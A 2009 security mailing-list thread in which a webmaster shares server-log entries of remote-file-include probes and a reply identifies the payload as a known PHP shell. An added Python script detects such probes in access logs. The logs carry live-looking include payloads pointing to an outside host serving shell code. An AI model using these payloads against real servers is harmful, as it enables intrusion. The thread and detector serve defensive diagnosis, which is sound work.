WebApp Sec: Re: 404 messages pointing to a strange location

Re: 404 messages pointing to a strange location

From: Simon <sunsetpicture_at_gmail.com>
Date: Sat, 03 Jan 2009 20:29:40 +0100

Hi Stefan,

Thanks for your answer. I honestly didn't dare to take a look at the txt
file ;), but in this case, it had certainly been interesting.

As I already mentioned in the mail to Tom, the directory /ju-album contains
html pages with links to the Exhibit Engine, so perhaps that's the reason
why someone ran the scan.

Here are the first 8 GET requests (46 in total) from the server log. The IP
changes again and again, but it's more or less always the same URLs it
tried to visit.

87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET /ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5971 "-" "libwww-perl/5.805"
87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET //ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5898 "-" "libwww-perl/5.805"
87.106.245.44 - - [01/Jan/2009:21:55:33 +0100] "GET /ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5934 "-" "libwww-perl/5.805"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET /ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5945 "-" "libwww-perl/5.814"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET //ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5905 "-" "libwww-perl/5.814"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET /ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 5941 "-" "libwww-perl/5.814"
87.106.245.44 - - [01/Jan/2009:22:08:13 +0100] "GET /ju-album/slides/DSC_5633.html//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 6022 "-" "libwww-perl/5.805"

I hope this helps :)

Simon

Stefan Tanase wrote:
> Hello Simon,
>
> Simon wrote:
>> Yesterday evening I had lots of 404-messages from my web server, all
>> pointing to locations like
>> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
>>
>
> ID3 is a well known PHP shell - PHP shells are scripts used by "bad
> guys" to gain access to your web server through an exploitable page in
> your website, for example through a vulnerable include statement.
>
>> I don't use paypal or anything similar on my page; what does that mean?
>>
>
> They are usually scanning thousands of web servers in search of the same
> vulnerabilities. You may not be using those vulnerable scripts (like
> paypalcart.php in this case) but some other webmasters may do :)
>
>> I'm wondering because these messages came in only yesterday before
>> midnight, several dozens.
>>
>
> Popular websites get requests like this 24/7 - it's just a matter of
> time until your server is found and they start scanning it for
> vulnerabilities.
>
> It's a good idea to keep a watch on this stuff, so you can make sure
> your websites are not vulnerable.
>
> Cheers,

Received on Jan 04 2009
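
The log entries quoted in this thread share one shape: a query parameter whose value is an absolute URL, requested against a script under several path prefixes from changing source addresses. The following Python is an added example, not part of the original messages, that groups such requests from an access log and marks any that were answered with something other than 404. It assumes Apache combined log format; the function name `find_rfi_probes` and the sample lines (documentation address ranges, made-up file names) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache combined log format (assumed): ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# A parameter value that is itself an absolute URL is the mark of an include probe.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation address ranges, hypothetical file names).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2009:21:55:32 +0100] "GET /album/slides//ee_commerce/paypalcart.php?toroot=http://198.51.100.7/id.txt? HTTP/1.1" 404 5971 "-" "libwww-perl/5.805"
192.0.2.10 - - [01/Jan/2009:21:55:32 +0100] "GET //ee_commerce/paypalcart.php?toroot=http://198.51.100.7/id.txt? HTTP/1.1" 404 5898 "-" "libwww-perl/5.805"
203.0.113.25 - - [01/Jan/2009:21:59:33 +0100] "GET /album//ee_commerce/paypalcart.php?toroot=http%3A%2F%2F198.51.100.7%2Fid.txt%3F HTTP/1.1" 404 5941 "-" "libwww-perl/5.814"
192.0.2.77 - - [01/Jan/2009:22:10:02 +0100] "GET /album/index.html?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"
203.0.113.25 - - [01/Jan/2009:22:11:40 +0100] "GET /album/view.php?img=http://198.51.100.7/id.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.814"
"""

def find_rfi_probes(lines):
    """Group requests that pass an absolute URL as a query parameter value."""
    probes = defaultdict(lambda: {"ips": set(), "agents": set(), "hits": 0, "non_404": 0})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        # partition, not urlsplit: a target starting with "//" would be read as a host name
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes values, so encoded "http%3A%2F%2F" is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if URL_VALUE_RE.match(value):
                # key on the script name so the varying path prefixes collapse into one probe
                entry = probes[(path.rsplit("/", 1)[-1], name, value.rstrip("?"))]
                entry["ips"].add(m["ip"])
                entry["agents"].add(m["agent"])
                entry["hits"] += 1
                entry["non_404"] += m["status"] != "404"  # the script exists: needs a look
    return dict(probes)

if __name__ == "__main__":
    for (script, param, url), e in find_rfi_probes(SAMPLE_LOG.splitlines()).items():
        flag = "CHECK: answered with non-404" if e["non_404"] else "all 404"
        print(f"{script}?{param}= -> {url}: {e['hits']} hits from {sorted(e['ips'])} ({flag})")
```

Legitimate parameters that carry URLs (redirect targets, for instance) also match, so the grouped output is for review rather than automatic blocking.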
